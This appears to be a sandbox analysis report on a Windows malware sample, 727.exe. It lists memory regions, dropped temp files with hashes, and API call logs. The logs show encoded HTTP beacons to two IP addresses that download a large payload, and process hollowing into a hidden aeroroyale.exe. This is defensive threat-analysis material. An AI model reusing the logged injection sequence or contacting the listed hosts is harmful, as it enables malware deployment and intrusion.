| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C0C
0x
C14
0x
C20
0x
C24
0x
C28
0x
C2C
0x
C30
0x
C38
0x
D2C
0x
D30
0x
D34
0x
D38
0x
D3C
0x
DB8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x00174fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00195fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002a0000 | 0x00306fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x003d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003f5fff | Private Memory | rw |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00550fff | Pagefile Backed Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x00560000 | 0x0059bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00561fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x00570000 | 0x00570fff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x00570000 | 0x0057ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00581fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00590000 | 0x00597fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x005b0000 | 0x005bffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x011dffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x011e0000 | 0x014aefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000014b0000 | 0x014b0000 | 0x0158efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001590000 | 0x01590000 | 0x01590fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000015a0000 | 0x015a0000 | 0x015dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015e0000 | 0x015e0000 | 0x016dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x0188ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x0181ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x017dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x016effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000016e0000 | 0x016e0000 | 0x016e6fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x01776fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x01703fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000016f0000 | 0x016f0000 | 0x016f6fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001710000 | 0x01710000 | 0x01746fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001750000 | 0x01750000 | 0x0178afff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001790000 | 0x01790000 | 0x01795fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000017a0000 | 0x017a0000 | 0x017bbfff | Private Memory | rwx |
|
|
|
- |
| f833.tmp | 0x017a0000 | 0x017a0fff | Memory Mapped File | r |
|
|
|
|
| private_0x00000000017c0000 | 0x017c0000 | 0x017d8fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000017e0000 | 0x017e0000 | 0x0181ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001820000 | 0x01820000 | 0x01820fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001830000 | 0x01830000 | 0x01831fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001850000 | 0x01850000 | 0x0188ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001890000 | 0x01890000 | 0x0198ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001990000 | 0x01990000 | 0x01a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a90000 | 0x01a90000 | 0x01b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b90000 | 0x01b90000 | 0x01beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01d86fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01d51fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001dc0000 | 0x01dc0000 | 0x01e1afff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0209ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020a0000 | 0x020a0000 | 0x0218dfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002190000 | 0x02190000 | 0x0228ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002290000 | 0x02290000 | 0x0238ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002390000 | 0x02390000 | 0x0248ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x0258ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x0268ffff | Private Memory | rw |
|
|
|
- |
| winscard.dll | 0x5fc00000 | 0x5fc22fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x6f010000 | 0x6f017fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x6f260000 | 0x6f265fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x6f280000 | 0x6f2d9fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x72720000 | 0x72731fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x72740000 | 0x7274cfff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x72750000 | 0x72761fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x72810000 | 0x72816fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x72820000 | 0x7283bfff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x72860000 | 0x72897fff | Memory Mapped File | rwx |
|
|
|
- |
| winrnr.dll | 0x72bc0000 | 0x72bc7fff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x72bd0000 | 0x72be1fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x72bf0000 | 0x72bfffff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x731f0000 | 0x73204fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x73210000 | 0x73261fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x73dd0000 | 0x73ddffff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x74110000 | 0x7411cfff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x74120000 | 0x74125fff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x74270000 | 0x74280fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74370000 | 0x7437cfff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x744c0000 | 0x744d2fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74f70000 | 0x74f74fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75040000 | 0x75056fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x752e0000 | 0x75323fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x75410000 | 0x75415fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x75420000 | 0x7545bfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75980000 | 0x7598dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x76f60000 | 0x76f65fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76f70000 | 0x7716afff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77660000 | 0x77754fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x77990000 | 0x77992fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x77a30000 | 0x77a64fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd3000 | 0x7ffd3000 | 0x7ffd3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 16 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp | 0.05 KB |
MD5:
61974b8f808747119a0234c563fda669
SHA1: 16bdeca2a2f85bc92c608d84ba8f892b692b2172 SHA256: f188d8900c336dc2745411755c8b90588a2c3d24a99afee9f9e13b8ddd3f53ea SSDeep: 3:PlQVlAVUKbnwRl+RJZ3E:dQPAbwDn |
|
|
| C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | 0.08 KB |
MD5:
172ee94da6ee51655ec4ff88bee8c5eb
SHA1: 6c8a98026cb9e733aa1b32f8516d268e831d13b9 SHA256: 28886aa73bb5eccdf20c58ade6ba559a89733369743301b30cbb33b9321ca1f7 SSDeep: 3:Rq3sFZJiKbNLQDW7q1KcKJRKVJmz:43sPJ38DjKNRo4 |
|
|
Threads
Thread 0xc0c
39
20
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\727.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcd0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcf0 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x77170000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = wsprintfA, address_out = 0x77183f47 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x77760000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x777abb08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7780bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x777ad9e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x77798c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x777abf00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x777acdcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x777acac4 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| System | Get Time | type = Ticks, time = 158091 |
|
2 | |
| System | Get Time | type = Ticks, time = 159105 |
|
1 | |
| System | Get Time | type = Ticks, time = 160119 |
|
1 | |
| System | Get Time | type = Ticks, time = 161133 |
|
1 | |
| System | Get Time | type = Ticks, time = 162147 |
|
1 | |
| System | Get Time | type = Ticks, time = 163161 |
|
1 | |
| System | Get Time | type = Ticks, time = 164175 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x75a90000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Load | module_name = user32.dll, base_address = 0x77170000 |
|
1 | |
| System | Get Time | type = Ticks, time = 170275 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 181.142.74.233, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Cookie: 17080=CWZZ8xG+qimIs4JLmfCTD8uEaAAPQ5uW5m/3/sEOJGiHx9WsJW/6vXHOVcYA4Tp9G1iOlk8QteuyaOY955LortwZ32jIs3Zh7vGJ+kBCA98Ce4ZD3W+h28Q8Sae74gZvJJCoRdG80JakNA+RZOtlmOiQyr5IMX3lXtiuQqwqdtenVipv1C+ouqApb7FW7L83aGRTc5V+WdEXQKfx+SpeVULEhQUtR9duN5nVPk9Xe9Jq9wad0ISWPHFXqrk2gSOZMvWc05zuC/Pf1Vtqp8l6rCVoQZow/3YHKVTtHu43t1DnurhDQyPyGgzfep2Jmr8hIBdUJwXwDbhlEscAxxa74DXoeC70G2hieetAkJKX6gsU1lwQTqPZycCN2QoRxlwT3lT9FFud7uXTWcGlcz9AuZBQOgp1vU0UzEvkwyKx/ARcU7iCSNF9XKeqo4w7t8h+q1h8SVqTQQ3+uD6kIzcaXU1kURHDyZ3ht+znkfQwPJcZwV2ubP7jDSI3DE4jap3FlUHDdj5Ls0OE5HMgh9K6GrgaTUK4lbJDDSH5qZv3Mw85L6XFuTS5ubDXXZGLQd/pPE4DVnsrHqnGJCmCEghj/8uOThxYoFhF4+Q1L58lWRzvZbXkDS8lTa50KUTZPTMoPOy13KmR/N96nH9mTUCT3tFLDRY=, url = 181.142.74.233 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 618356 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Get Time | type = Ticks, time = 252518 |
|
4 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Time | type = Ticks, time = 252581 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 204.184.25.164, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Cookie: 33851=phfTzCKW4Tl/BW16W5kFXWvBkxgO+gzFE/vhBHTF43KTJuoA3Q2E5wpNa43Z8BAfTR1e20qtPY8fdfKyfgtU2CG9lT7HzmUoAXq71Mb93C80V3xF7HCdxpwckxOE5ZR2+/tuP4rJa7epXUt3HFFRepUNUfQnRZO5tZ/1+OyRJHjBiaV1cGIC3k2fQETnHfyBxPXhf56zmE+2CE6/CP78GawxyaW3aRsjO+ihGmBllyioMuK/V8HiAn95oHbs6LjIZJOK7Dum5szlhNl9nAWWjWr1nhnBY2VHFAeigJq7IN19x+tuNfZl8t9YiBcnPjPqRzqEA39/M66p8ok0yWRh2VIoFY+QsGfWKhtwa9B3ibo+q8vwomMhd8plGFEA5O9rizFcUzWX/L0dPk+jXrCd90pIdwUJ3nK4wzJX9xByICHPyJ4NszT3JogD1sZxf1ptaebJvU1vMOAC8w5h7qQf/ZJaFLsFw6XCc6GnCWCC2+2MTZPwTAva5op7JvWb/9TN5RfgzbBCMdTjmZg4uj5ZfTitOWLHhrn3hnfydNQJHEHL9IgByTV/m7w2MZpF6+kvac+NMZdWKVN0RAzxjEFc1SelyNzLKq+FCPiQQ/53ZbG/s/5yZZkD5VgGwkU0Sfem3d+Kq+d+3h/RV6rzt+DgwyA0y6EsQODD3BWu8YUHtYYkUfyj, url = 204.184.25.164 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 618356, size_out = 618356 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 |
Thread 0xd2c
26
10
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x75c90000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x75a90000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x760f0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x75040000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77660000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74370000 |
|
1 | |
| File | Create Temp File | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, path = C:\Users\BGC6U8~1\AppData\Local\Temp\ |
|
1 | |
| File | Delete | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp", os_pid = 0xd40, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Memory | Protect | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Thread | Get Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, os_tid = 0xd2c |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp", address = 0x400000, size = 114688 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp", address = 0x7ffdf008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, os_tid = 0xd2c |
|
1 | |
| Thread | Resume | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, os_tid = 0xd2c |
|
1 | |
| Process | Terminate | exit_code = 0 |
|
1 | |
| File | Create | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
